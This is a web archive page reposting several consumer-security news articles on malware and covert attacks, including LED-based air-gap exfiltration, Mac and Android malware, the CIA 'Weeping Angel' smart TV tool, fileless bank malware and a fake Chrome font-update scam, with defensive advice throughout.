fbpx

A FEW HOURS after dark one evening earlier this month, a small quadcopter drone lifted off from the parking lot of Ben-Gurion University in Beersheba, Israel. It soon trained its built-in camera on its target, a desktop computer’s tiny blinking light inside a third-floor office nearby. The pinpoint flickers, emitting from the LED hard drive indicator that lights up intermittently on practically every modern Windows machine, would hardly arouse the suspicions of anyone working in the office after hours. But in fact, that LED was silently winking out an optical stream of the computer’s secrets to the camera floating outside.

That data-stealing drone, shown in the video below, works as a Mr. Robot-style demonstration of a very real espionage technique. A group of researchers at Ben-Gurion’s cybersecurity lab has devised a method to defeat the security protection known as an “air gap,” the safeguard of separating highly sensitive computer systems from the internet to quarantine them from hackers. If an attacker can plant malware on one of those systems—say, by paying an insider to infect it via USB or SD card—this approach offers a new way to rapidly pull secrets out of that isolated machine. Every blink of its hard drive LED indicator can spill sensitive information to any spy with a line of sight to the target computer, whether from a drone outside the window or a telescopic lens from the next roof over.

{youtube}/4vIu8ld68fc{/youtube}

“If an attacker has a foothold in your air-gapped system, the malware still can send the data out to the attacker,” says Ben-Gurion researcher Mordechai Guri, who has spent years focusing on finding techniques for ferreting data out of isolated computer systems. “We found that the small hard drive indicator LED can be controlled at up to 6,000 blinks per second. We can transmit data in a very fast way at a very long distance.”

Gap Attack

An air gap, in computer security, is sometimes seen as an impenetrable defense. Hackers can’t compromise a computer that’s not connected to the internet or other internet-connected machines, the logic goes. But malware like Stuxnet and the Agent.btz worm that infected American military systems a decade ago have proven that air gaps can’t entirely keep motivated hackers out of ultra-secret systems—even isolated systems need code updates and new data, opening them to attackers with physical access. And once an air-gapped system is infected, researchers have demonstrated a grab bag of methods for extracting information from them despite their lack of an internet connection, from electromagnetic emanations to acousticand heat signaling techniques—many developed by the same Ben-Gurion researchers who generated the new LED-spying trick.

But exploiting the computer’s hard drive indicator LED has the potential to be a stealthier, higher-bandwidth, and longer-distance form of air-gap-hopping communications. By transmitting data from a computer’s hard drive LED with a kind of morse-code-like patterns of on and off signals, the researchers found they could move data as fast as 4,000 bits a second, or close to a megabyte every half hour. That may not sound like much, but it’s fast enough to steal an encryption key in seconds. And the recipient could record those optical messages to decode them later; the malware could even replay its blinks on a loop, Guri says, to ensure that no part of the transmission goes unseen.

The technique also isn’t as limited in range as other clever systems that transmit electromagnetic signals or ultrasonic noises from speakers or a computer’s fans. And compared to other optical techniques that use the computer’s screen or keyboard light to secretly transmit information, the hard-drive LED indicator—which blinks anytime a program accesses the hard drive—routinely flashes even when a computer is asleep. Any malware that merely gains the ability of a normal user, rather than deeper administrative privileges, can manipulate it. The team used a Linux computer for their testing, but the effects should be the same on a Windows device.

“The LED is always blinking as it’s doing searching and indexing, so no one suspects, even in the night,” says Guri. “It’s very covert, actually.”

Slow and Steady

The researchers found that when their program read less than 4 kilobytes from the computer’s storage at a time, they could cause the hard drive’s LED indicator to blink for less than a fifth of a millisecond. They then tried using those rapid fire blinks to send messages to a variety of cameras and light sensors from an “infected” computer using a binary system of data encoding known as “on-off-keying,” or OOK. They found that a typical smartphone camera can at most receive around 60 bits per second due to its lower frame rate, while a GoPro camera captured as much as 120 bits per second. A Siemens photodiode sensor was far better suited to their high-frequency light sensing needs, though, and allowed them to hit their 4,000 bits per second maximum transmission rate.

The malware could also make the hard drive LED blink so briefly, in fact, that it would be undetectable to human eyes, yet still registered by the light sensor. That means an attacker could even send invisible light signals to a faraway spy, albeit at a slower rate to avoid its covert blinks blurring into a visible signal. “It’s possible for the attacker to do such fast blinking that a human never sees it,” says Guri.

The good news, however, for anyone security-sensitive enough to worry about the researchers’ attack—and anyone who air gaps their computers may be just that sensitive—is that the Ben Gurion researchers point to clear countermeasures to block their hard drive LED exfiltration method. They suggest keeping air-gapped machines in secure rooms away from windows, or placing film over a building’s glass designed to mask light flashes. They also note that protective software on a target machine could randomly access the hard drive to create noise and jam any attempt to send a message from the computer’s LED.

But the simplest countermeasure by far is simply to cover the computer’s LED itself. Once, a piece of tape over a laptop’s webcam was a sign of paranoia. Soon, a piece of tape obscuring a computer’s hard drive LED may be the real hallmark of someone who imagines a spy drone at every window.

This article was published in wired.com by ANDY GREENBERG

Categorized in Internet Privacy

It used to be that Mac users didn’t really have to worry about malware. But we live in a brave new world with easy internet access and a bunch of jerks, so the good ‘ole days are over. A new strain of Mac malware uses a familiar method to gain entry to your computer, but it’s the way it takes over that makes it particularly nasty.

The initial malware package is loaded by a standard phishing attack. The hackers send an email saying that there’s issues with your tax return, with details in a .zip file attached. When you try to open the .zip folder, the malware package instead installs a small executable named AppStore.

That program then runs every time you boot the computer up, until the full malware package has been installed. Once that happens, users will see a fake macOS update page which looks decently close to the real thing. The “update” page sits on top of every other window, and prevents you from using your computer until you hit update.

Once you hit update, you’re prompted to enter your password. That’s where the really nasty stuff starts. Using the administrator privileges just granted, the malware installs dark-web surfing program Tor, and changes your web settings using a developer certificate, so all your web traffic gets routed through a third-party proxy server.

With all that established, the attacker can see and modify all your web browsing behavior, including any data sent over encrypted web links that would normally be secure. With that kind of access and a little time, the attacker will be able to steal most people’s login info for every site, online banking details, and anything else you can really think of.

As per usual, the best defence isn’t antivirus software: it’s strong account security and a healthy skepticism of any email attachments. Not opening attachments unless they’re from a well-trusted source is a good start; using two-factor authentication on all your accounts, particularly important emails and online banking, will mitigate the potential damage from a hack.

This article was  published on bgr.com by Chris Mills

Categorized in Internet Privacy
android falseguide news malware
Another week, another Android malware.

Android malware often takes the form of infected apps on the Google Play Store, and a new variant called FalseGuide has been discovered by security company Check Point.

While Google has been pushing monthly security updates, manufacturers like Samsung unfortunately often delay on pushing these updates to customers. The result? According to Google, half of Android devices did not receive security updates in 2016. That’s particularly problematic when malware like FalseGuide shows up, as it gives that malware an opportunity to take advantage of more unprotected phones.

“FalseGuide creates a silent botnet out of the infected devices for adware purposes. A botnet is a group of devices controlled by hackers without the knowledge of their owners,” says Check Point in a blog post. “The bots are used for various reasons based on the distributed computing capabilities of all the devices.”

Issues arise when the apps are downloaded, after which they’ll request administrator permissions, which can then be used against the owner of the phone. For now, it appears as though those permissions allow the app to deliver “illegitimate pop-up ads out of context,” but they could also be used to instigate DDoS attacks.

The malware was first discovered a few days ago, and appeared in a hefty 44 game guide apps. Those apps were since removed, but another five apps with the malicious code were then discovered. Scarily enough, some of these apps were uploaded as early as November 2016 — so they stayed on the Google Play Store for around 5 months before being taken down. As far as users impacted by the malware, Check Point estimates between 500,000 to 1.8 million users. Thankfully, of the 49 infected apps, 28 of them were downloaded less than 10 times and seven of them were apparently never downloaded.

It’s unlikely the Google Play Store will ever be totally safe — but it is the safest place to download Android apps. For now, it’s important to download only official apps, and stick with the ones that you trust.

This article was  published on Digital Trends by Christian de Looper

Categorized in Internet Privacy

People love using macOS for plenty of reasons: its simple navigability, its built-in suite of creative-minded tools, and y'know, the whole Apple fanboy thing. But the OS's perceived security remains one of the biggest draws for picking a Mac over a Windows device

That security, however, may be at risk. McAfee Labs' latest Threats Report, published at the beginning of the month, shared some potentially sobering news for Mac users: There's been a massive spike in new malware targeting macOS, resulting in a more than 700 percent increase in the malicious software from just the year before. The influx came during Q4 2016, the last quarter for which data has been gathered.

 

McAfee recorded nearly 350,000 new malicious samples on macOS—and more than 460,000 reports of malware affecting macOS overall—during the quarter. That's an exponential increase from Q3 2016, which posted barely 50,000 new samples. The year before had even fewer instances of the nasty software, as Q4 2015 barely registered any new reports. 

The increase in malware comes as more people buy Apple's computers and use its OS, as Fortune notes. 

There is a bright side, though: McAfee says that the majority of the malware came from adware bundling, which looks to deluge your web browsing experience with popup ads. It's annoying, sure, but it's preferable to truly malicious software that aims to take over your laptop or knock your computer out of commission.

WATCH: Google takes on fake news with 'Fact Check' tags in Search and News

WATCH Google takes on fake news with Fact Check tags in Search and News

Source : mashable.com

Categorized in Internet Privacy

Your smartphone is surprisingly vulnerable to viruses and malware. But you can protect yourself.

BARCELONA — The smartphone industry has given birth to a vibrant growth sector distinguished by its creativity, drive and entrepreneurship. Unfortunately, that sector is malware.

Conversations with security professionals here at Mobile World Congress, the world’s largest mobile tech show, provided a dismaying, but necessary, reminder that the computers in our pockets are targets for authors of malware and other scams — and that many of us don’t care about those risks.

“The amount of thought that consumers are giving to security is almost nonexistent,” said Gary Davis, chief consumer security evangelist at Intel (INTL).

App anxiety

The major malware risk on smartphones remains downloading a hostile app that tries to compromise your data or run up your phone bill. The best advice to avoid such threat is to stick to the Google (GOOG, GOOGL) Play Store instead of downloading apps from third-party stores or off the Web.

The fact that Google screens its Play Store apps makes the risk of malware there “dramatically less than a third-party app store, by far,” said Davis. Still, the Play Store isn’t immune from crooks.

Last month, for instance, the Slovakian security firm ESET found a trojan app on the Play Store disguised as a world weather app. Google yanked the app after ESET notified the company.

“We encounter these things … I would say every couple of months,” said ESET chief technical officer Juraj Malcho. The risk of downloading malware on iOS is vanishingly small in comparison to Android, thanks in part to the strict limits Apple (AAPL) places on how apps interact with the operating system.

A recent report by Intel’s McAfee subsidiary noted a related issue: Many customers still have copies of apps on their devices that have long since been removed from the Play Store. The report urged more notification and disclosure when apps are taken out of the marketplace.

Read the reviews, please

But many users may ignore those alerts if an app looks legit. The McAfee report noted an example of a photo app that silently signed users up for premium text messaging services — and yet still earned a 3.5 out of 5 rating on the Play Store.

ESET’s Malcho said he wished people would look past apps’ ratings and instead check users’ comments. “Many times, we encounter clear reviews in the text, ‘Don’t install this,’ ‘this is bloody malware,’ and people install it anyway.”

Some of the countries represented at MWC don’t have access to the Play Store, because their governments block Google. That leaves those users subject to whatever defenses their local app store alternatives offer.

Niloofar Amini, business developer at Tehran-based Cafe Bazaar, said his Iranian firm has a dedicated review team to assess and re-assess apps. Of course, the company also has to ensure that titles comply with the Islamic Republic’s morality laws and limits on political speech.

If you’re in China? Good luck. Intel’s Davis described app stores there as “just riddled” with malware.

Good and bad news on phones

The show floor provides one reason for optimism about the state of Android security: fingerprint sensors. When even cheap, unlocked phones like the $229 Moto G5 Plus can be unlocked via its fingerprint sensor, we should begin to see more people securing their phones.

Today, a disturbingly high number — 28 percent of Americans, according to a Pew Research Center study released in January — don’t lock their phones at all. Without that, a stolen phone can easily be wiped and resold … after the thief abuses all the personal data on it.

“Let’s stop calling it a phone,” said Raj Samani, Intel Security’s chief technical officer for Europe, the Middle East and Africa. “It’s not even a computing device — it is our digital passport.”

Unfortunately, most of the devices on the floor don’t run the latest version of Android, which can leave them open to security holes. Demo units of Samsung’s new Tab S3 tablet, LG’s G6, Moto’s G5 Plus and HTC’s (headphone jack-deprived) U Ultra all ran Google’s Android 7.0, which shipped in August, not its subsequent updates.

The new Nokia 5 was a refreshing exception, showing the current 7.1.1 release and security patches current through March 1 — but that phone hasn’t been announced for the U.S. market yet.

Meanwhile, the majority of Android phones run older versions that lack the stronger security of 7.0, and the stricter control of apps added in 2015’s Android 6.0. Intel’s Samani called those “brownfield” devices, after the term developers use for environmentally contaminated sites that they sometimes must build on.

ESET’s Malcho mused out loud about a more extreme fix for that brownfield-phone problem: “Make the device so it dies in two years.”

Source : Yahoo.com

Categorized in Internet Privacy

Master cyber criminals, super-trojans, workforce shifts, advanced analytics and more – CBR talks to the experts about how 2017 could prove an even bigger, smarter year for artificial intelligence.

AI certainly arrived with aplomb in 2016 with chatbots, digital assistants, PokemonWatson, and DeepMind just some of the AI companies and tech bringing artificial intelligence to the masses. The opportunities, benefits and promise of the technology, so experts say, is vast – limitless even – so what can we expect in the coming year?CBR talked to the top AI experts about their artificial intelligence predictions for the new year, with 2017 already shaping up to be even smarter than 2016.

Artificial Intelligence Predictions for 2017:

The Year of the digital Moriarty

Ian Hughes Analyst, Internet of Things, 451 Research

“With so much data flowing from the interconnected world of IoT, higher end AI is being used to find security holes and anomalies in systems that are too complex for humans to control. Security breaches we have seen so far have been brute force ones, the equivalent of a digital crow bar.

“AI being used to protect is clearly a benefit, but this technology is increasingly available to anyone, replacing the digital crow bar with a virtual master criminal, 2017 might just see Holmes versus Moriarty digital intellects start to battle it out behind the scenes.”

Artificial Intelligence Predictions

Artificial Intelligence Predictions for 2017:

The Year Machines Steal more human jobs than ever before

Dik Vos, CEO at SQS

“We will continue to see a rise in digital technology over the coming years, and 2017 will be the year we see the likes of Artificial Intelligence (AI) and automated vehicles take the place of low-skilled workers.

With machines pushing humans out of a number of jobs including, logistics drivers and factory workers, I predict we will see an increased emphasis placed on the retraining of up to 30 per cent of our working population. People want and need to work and 2017 will see those workers who have lost their jobs through digitalisation, start to filter across a variety of other sectors including manufacturing and labour.”

Artificial Intelligence Predictions for 2017:

The Year of the Buzzword Mart

Hal Lonas, CTO at Webroot

“In 2017 we will see an explosion of companies shopping at Buzzword Mart. The growing attention paid to terminology like Artificial Intelligence and Machine Learning will lead to more firms incorporating “me too” marketing claims into their messaging.  Artificial Intelligence predictions -buzzwordProspective buyers should take these claims with a grain of salt and carefully check the pedigree and experience of firms claiming to use these advanced approaches. Buyers are rightfully confused, and it is difficult to compare, prove, or disprove efficacy in an ecosystem where market messaging is dominated by legacy or unicorn-funded voices. All too often we see legacy technology bolting barely-functional technology onto bloated and ill-architected heavy-weight solutions, leading to a poor end product whose flaws can range from bad user experience to security vulnerabilities.

“This rings especially true for security, where the distinction between legitimate machine learning trained threat intelligence and a second-rate snap-on solution can be the difference between leaking critical customer or IP data files, or blocking the threat before it reaches the network.”

Artificial Intelligence Predictions for 2017:

The Year of AI-as-a-service

Abdul Razack, SVP & Head of Platforms, Big Data and Analytics, Infosys

“AI-as-a-Service will take off: In 2016 AI was applied to solve known problems. As we move forward we will start leveraging AI to gain greater insights into ongoing problems that we didn’t even know existed. Using AI to uncover these “unknown unknowns” will free us to collaborate more and tackle new, interesting and life-changing challenges.”

Artificial Intelligence Predictions for 2017:

The Year CIOs Take the AI Helm

Graeme Thompson, SVP and CIO, Informatica

“With the accelerating pace of business, organisations need to deliver change and make decisions at a rate unheard of just a few years ago. This has made human-paced processing insufficient in the face of the petabytes and exabytes of data that are pouring into the enterprise, driving a rise in machine learning and AI.

“Whereas before, machines would be used to complete a few tasks within a workflow, now they are executing almost the entire process, with humans only required to fill in the gaps.

“Rewind 20 years and we used tools like MapQuest to figure out the shortest distance between two points, but we never would have trusted it to tell us where to go. Now, with new developments like Waze, many of us delegate the navigation of a journey entirely to a machine.

Artificial Intelligence Predictions - leader

“Before long, humans will no longer be needed to fill the gaps. We’ll find that machines are fully autonomous in the case of driverless cars, for example, because they can store and make sense of much more information than humans can process. However, organisations capitalising on the benefits of AI and machine learning will have to ensure data quality to guarantee the accuracy of these fast responses. Un-validated or inaccurate data in a machine learning algorithm causes misleading insights or inaccurate actions when automated.

“In 2017, CIOs will be tasked with taking the helm of data driven initiatives and ensuring that data is clean enough to be processed by machines to drive fast and accurate insight and action.”

Author : ELLIE BURNS

Source : http://www.cbronline.com/news/internet-of-things/smart-technology/artificial-intelligence-predictions-2017-expect-ai-service-smart-malware-digital-moriarty/#

Categorized in Science & Tech

Keeping malware off of your mobile device should be a top priority for anyone who purchases a new smartphone or tablet, but what if the battle against bad actors has been lost before you even open the box? That’s exactly what security firm Check Point says is happening right now, and it just released a report claiming that it detected malware on 36 different Android devices being used by multiple large tech companies.

The devices on which the malicious code was detected are thought to have been compromised at some point between manufacturing and eventual sale to the end user. “The malicious apps were not part of the official ROM supplied by the vendor,” Check Point’s Mobile Threat Prevention team explains in a blog post, adding that the malware must have been added “somewhere along the supply chain.”

In Check Point’s investigation, the devices that were shown to have preinstalled malware come from many different manufacturers. They include: Galaxy Note 2, 3, 4, 5, and 8, Asus Zenfone 2, LG G4, Nexus 5 and 5X, and Xiaomi Mi 4i and Redmi.

For better or worse, the malware found to be installed on the devices is fairly well known in mobile security circles and includes Loki, a malicious advertising bot, and Slocker, which uses the Tor network to send data back to its creator while avoiding detection. This is obviously a very serious situation, and it’s certainly not the first time Android devices were found to have security issues right out of the box. Check Point hasn’t revealed what company the devices belonged to, but that might not actually matter in the grand scheme of things, as it appears preinstalled malware is becoming something of a trend on Google’s mobile OS.

Trending right now:

  1. The Galaxy S8 won’t be able to deal with the iPhone 8’s killer feature
  2. There’s a new Google Pixel in stores, but it’s not the Pixel 2
  3. Despite imminent Galaxy S8 launch, now is the perfect time to buy a Galaxy S7

See the original version of this article on BGR.com

Source : https://www.yahoo.com/tech/38-popular-android-devices-ship-malware-already-installed-010213452.html

Categorized in Internet Privacy

The malware, developed during a hackathon between British and American spies, turns ordinary smart TVs into listening devices.

Buried in a trove of classified and secret CIA documents leaked earlier on Tuesday are files that show British and American spies worked closely together to hack into smart TVs.

The documents, which can't be independently verified, are part of a trove of files provided by WikiLeaks, which dropped thousands of documents said to be from the CIA's elite hacking unit, dubbed the Center for Cyber Intelligence

Although the CIA has yet to comment, former NSA contractor turned whistleblower Edward Snowden said that the cache "looks authentic," because program and office descriptions named in the documents could only be known by a "cleared insider."

One such program, dubbed "Weeping Angel," allowed spies to turn a regular Samsung smart TV into a listening device.

The "secret" classified program, developed during a hackathon between spies at the CIA and British domestic security service MI5 in mid-2014, is said to act like a regular smart TV app, but it can record audio from its surrounding areas, such as a living room or a busy office.

According to Shodan, the search engine for internet-connected devices, there are at least 11,300 Samsung smart TVs connected to the internet.

In case you didn't know, many Samsung and other smart TVs come with an embedded microphone and camera to power its voice-recognition system and other features.

A review of a number of documents show how crafty the malware is: One file said the malware can suppress the TV's power functionality to make it look like the smart TV is turned off.

The so-called "Fake-Off" mode would trigger when the user uses the remote control to turn the TV off, because the malware "already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," said one document.

The malware also suppresses the TV's power light to make it look as though the TV was powered down, but it allowed spies to keep recording.

According to another document, the malware can also extract Wi-Fi passwords and install a root certificate to carry out man-in-the-middle attacks.

That could allow further exploitation of the network that the smart TV is connected to.

A future version of the malware appears to look into recording images and video from the smart TV (if it comes with an embedded camera) as well as live streaming of audio.

It's not the first time smart TVs have been targeted for surveillance.

Samsung's smart TVs were known to be streaming back continuous recordings as early as 2015 after security researchers found the devices were transmitting outbound data. Samsung since updated its privacy policy to warn that personal and other sensitive information can be picked up by the TV's microphone.

Kenneth White, a security researcher and cryptographer, told The Intercept that smart TVs are a "historically pretty easy target," and that there is "zero chance" that the CIA targeted only Samsung.

Author : Zack Whittaker

Source : http://www.zdnet.com/article/how-cia-mi5-hacked-your-smart-tv-to-spy-on-you/

Categorized in Internet Privacy
Banks around the world have been the target of malware attacks for quite some time now. Criminals continue to step up their game in this department, as fileless malware is starting to become a lot more mainstream as of late. A very troublesome development, to say the least, as it seems impossible to defend against these types of attacks.

FILELESS MALWARE BECOMES THE NEW TREND

When one thinks of malware, one often assumes the payload is distributed through a malicious file. In most cases, criminals spread malware through infected email attachments, which has proven to be quite a successful method of attack so far. Despite these initial successes, it remains important for online criminals to come up with new methods to wreak havoc using malware.

Two years ago, researchers came across a peculiar type of malware infection that raised a lot of questions. Kaspersky Lab had their network infected with an unknown type of malware. It was unclear how this infection was even possible, considering there were no malicious files found anywhere on the system. As it turns out, Kaspersky Lab was hit by a fileless malware, as all of its components resided in the memory of the compromised computers. This allowed the infection to remain undetected for quite some time.

Fast forward to today and it appears fileless malware attacks are becoming far more common than anticipated. New research published by Kaspersky Lab shows at least 140 banks and other enterprises across 40 different countries have been affected by fileless malware during recent distribution campaigns. Every single attack against these institutions relies on malware hiding in the physical memory of infected systems, making it near impossible to get rid of the infection in the first place. Dealing with invisible malicious software is a very troublesome development for security researchers.

To make matters even worse, this fileless malware is injected into the computer’s memory through widely used administrative tools. PowerShell and Metasploit are the two primary distribution methods, for the time being. Unfortunately, banks are not adequately prepared for this method of attack, which is exactly why criminals are going after financial institutions in the first place. The bigger question is what can be done to nip this attack in the bud, albeit that remains somewhat unclear at this stage.

hidden malware

One silver lining in all of this is how the Kaspersky Labs researchers obtained an intact sample of the fileless malware while it was residing in an infected computer’s physical memory. After analyzing this sample, it became clear this fileless malware was used to harvest passwords of system administrators and those engineers who have remote administration access to network-connected machines.

For the time being, security researchers remain uncertain as to how the malware takes hold in the first place. Remote injection attacks or exploits targeting popular online content management applications is one potential attack vector. More information regarding fileless malware will be provided in the coming months, as it will take quite some time to analyze this new threat.

Author : JP Buntinx

Source : https://themerkle.com/invisible-malware-infects-140-banks-across-40-different-countries/

Categorized in Internet Privacy

Google Chrome users need to be on the lookout for websites trying to trick them into downloading a font update package for their browser, as most chances are that the file is laced with malware.

This infection technique was discovered by Proofpoint researchers, who say that only Chrome users on Windows are targeted, only from specific countries, and only if they navigated to a compromised website using a specific route (referrer), such as search engine results.

Attack replaces HTML tags, destroys web pages

The technique relies on attackers compromising websites and adding their own scripts to the site's source code.

These scripts filter out the incoming traffic and load another malicious script only for Chrome users on Windows.

This second script will replace HTML tags with "& # 0," which ruins the site's content and displays "�" characters all over the page.

These characters are often encountered on websites and in software when there's a font and character rendering problem. As such, the crooks display a popup telling the user that a specific font wasn't found on their device, and the user will need to download and install a font package update.

To give it legitimacy, the popup is marked with Google Chrome's logo and uses classic button styles, as seen on the official Google Chrome website. A GIF showing the entire infection chain is available below:

EITest infection chain targeting Chrome users

According to Proofpoint, this technique was regularly found on hacked sites, as part of the EITest infection chain. EITest is the nickname given to a malware distribution campaign, similar to pseudo-Darkleech.

The group behind EITest works by compromising a large number of websites, usually WordPress or Joomla, using known vulnerabilities.

They act by stealing small amounts of traffic (users) from these sites and redirecting them to a malicious payload.

The EITest campaign appeared in 2014, and across time, the final payload has varied greatly, hinting that the EITest group is renting out their traffic source to multiple other cyber-criminal operations.

For the vast majority of its lifespan, the EITest group has rented traffic to exploit kit operators, who used Flash, Silverlight, IE, and other vulnerabilities to install malware on the users' devices automatically, without the user ever noticing anything wrong.

Chrome users infected with Fleercivet click-fraud malware

These recent "font wasn't found" attacks on Chrome users are different because they rely on users clicking a download button, something that doesn't guarantee the same high level of successful infections that exploit kits assure.

Proofpoint says that the font update packages that users download via this technique are infected with the Fleercivet click-fraud malware, which works by navigating to preset URLs and clicking on hidden ads behind the user's back, earning crooks money.

This same malware was advertised on underground cybercrime services under the name of Simby in early 2015, and Clicool in late 2015 and in 2016.

Author: Catalin Cimpanu
Source: https://www.bleepingcomputer.com/news/security/chrome-users-targeted-with-malware-via-new-font-wasnt-found-technique

Categorized in Internet Privacy
Page 2 of 3

airs logo

Association of Internet Research Specialists is the world's leading community for the Internet Research Specialist and provide a Unified Platform that delivers, Education, Training and Certification for Online Research.

Get Exclusive Research Tips in Your Inbox

Receive Great tips via email, enter your email to Subscribe.

Follow Us on Social Media

Book Your Seat for Webinar - GET 70% OFF FOR MEMBERS ONLY      Register Now